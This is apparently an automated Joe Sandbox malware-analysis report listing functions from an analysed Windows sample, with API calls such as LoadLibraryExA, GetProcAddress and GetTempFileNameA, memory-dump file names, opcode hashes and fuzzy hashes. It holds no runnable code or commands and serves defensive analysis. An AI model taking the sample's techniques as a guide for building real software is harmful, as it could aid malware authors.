                                            • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                            • Opcode Fuzzy Hash: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                            • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                            • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                            APIs
                                            • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                            • wsprintfA.USER32 ref: 00404C1C
                                            • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                            • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                            • Opcode Fuzzy Hash: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                            • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020F5
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,76D523A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,76D523A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                            • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                            • Opcode Fuzzy Hash: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                            • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                            APIs
                                            • DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                            • GetTickCount.KERNEL32 ref: 00402EFE
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                            • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                            • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405E63
                                            • GetTempFileNameA.KERNEL32(0000000C,?,00000000,?,?,004033D6,00436000,00436400,00436400,00436400,00436400,00436400,00436400,004036B5,?,00000008), ref: 00405E7D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: nsa
                                            • API String ID: 1716503409-2209301699
                                            • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                            • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $=q$$=q$$=q$$=q
                                            • API String ID: 0-886517230
                                            • Opcode ID: 417683d69349d31a016577f38a5da7b12586e070b494ff81c486d28513334de9
                                            • Instruction ID: 0205531d7c128297291408e76112e1bb211e3980fb5753bb1f2b441cede1e218
                                            • Opcode Fuzzy Hash: 417683d69349d31a016577f38a5da7b12586e070b494ff81c486d28513334de9
                                            • Instruction Fuzzy Hash: DB813534A01248CFDB19EFA5D59469EB7B3BF88315F208429D419AB355DB39EC86CB80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR=q$LR=q$$=q$$=q
                                            • API String ID: 0-2983188751
                                            • Opcode ID: 11741ae1b6ae8bfaf251dc0acbf443c4b2c946aeb3b23c3c043e210ea9d0b00b
                                            • Instruction ID: 96fedde08872407f87b9a62d2a12ee8046b3b068a2e50b5d5c6556b19a2467c7
                                            • Opcode Fuzzy Hash: 11741ae1b6ae8bfaf251dc0acbf443c4b2c946aeb3b23c3c043e210ea9d0b00b
                                            • Instruction Fuzzy Hash: 5E51EA347002859FEB09DF78CA95A6AB7B2FF89314F108569E419AB391DE35EC02CF50
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                            • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                            • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C